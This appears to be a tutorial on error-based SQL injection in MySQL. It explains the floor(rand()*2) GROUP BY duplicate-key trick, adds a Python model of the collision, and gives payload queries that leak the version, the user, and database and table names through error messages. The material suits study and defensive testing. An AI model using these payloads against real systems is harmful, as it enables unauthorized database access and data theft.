#### 1. Self-disclosure

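Self-disclosure: even when the query produces no error, force one, and have the error message carry the queried data back out, so that it tells the injector exactly what the database holds and gives away everything it can.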

Related functions: `if()`, `rand()`, `floor()`, `ifnull()`, `concat()`, `group_concat()`

#### 2. Self-disclosure: exposing the user name

1. Principle:

```sql
select count(*), floor(rand()*2) as a from users group by a;
```

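The 2 is the factor (the multiplier applied to `rand()`); the smaller the number, the more likely a collision. The minimum is 2.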
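Why the query above fails with a duplicate-key error, as an added Python model (not code from the original page): it assumes MySQL evaluates the GROUP BY key once to look up its temporary table and a second time when inserting a new group, and the names `mysql_rand`, `group_by_floor_rand` and `DuplicateEntry` are invented here. It uses the seeded `rand(0)` form that appears in section 3 so the run is repeatable.

```python
class DuplicateEntry(Exception):
    """Stands in for MySQL's "Duplicate entry '...' for key" error."""


def mysql_rand(seed):
    """Model of MySQL's seeded RAND(N) stream (constants are an assumption
    about the server's generator, not taken from the page)."""
    m = 0x3FFFFFFF
    s1 = (seed * 0x10001 + 55555555) % m
    s2 = (seed * 0x10000001) % m
    while True:
        s1 = (s1 * 3 + s2) % m
        s2 = (s1 + s2 + 33) % m
        yield s1 / m


def group_by_floor_rand(row_count, factor=2, seed=0):
    """Simplified model of: select count(*), floor(rand(seed)*factor) as a
    from <table with row_count rows> group by a"""
    rnd = mysql_rand(seed)
    temp = {}                                # temporary table: key -> count(*)
    for row in range(1, row_count + 1):
        key = int(next(rnd) * factor)        # 1st evaluation: look the key up
        if key in temp:
            temp[key] += 1
            continue
        key = int(next(rnd) * factor)        # 2nd evaluation: value actually inserted
        if key in temp:                      # unique key on the temp table is violated
            raise DuplicateEntry(f"row {row}: Duplicate entry '{key}' for group key")
        temp[key] = 1
    return temp


if __name__ == "__main__":
    stream = mysql_rand(0)
    print("floor(rand(0)*2):", [int(next(stream) * 2) for _ in range(6)])
    print("2 rows:", group_by_floor_rand(2))
    try:
        group_by_floor_rand(3)
    except DuplicateEntry as err:
        print("3 rows:", err)
    print("3 rows, factor 1000:", group_by_floor_rand(3, factor=1000))
```

With factor 2 the model fails on the third row, while a large factor rarely collides. Whatever is concatenated into the key reaches a client only when the application returns the database error text.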

2. Exposing sensitive information such as the system user name

```sql
select count(*), concat(version(), floor(rand()*2), user()) as a from users group by a;
```

#### 3. Exposing all database names and table names

All database names:

```sql
select count(*),
       concat((select (select (SELECT schema_name FROM information_schema.schemata limit 0,1)) as a_col
               from information_schema.tables limit 0,1),
              floor(rand(0)*2)) x_col
from information_schema.tables
group by x_col
```

All table names:

```sql
select count(*),
       concat((select (select (SELECT table_name FROM information_schema.tables where table_schema=database() limit 0,1)) as a_col
               from information_schema.tables limit 0,1),
              floor(rand(0)*2)) x_col
from information_schema.tables
group by x_col
```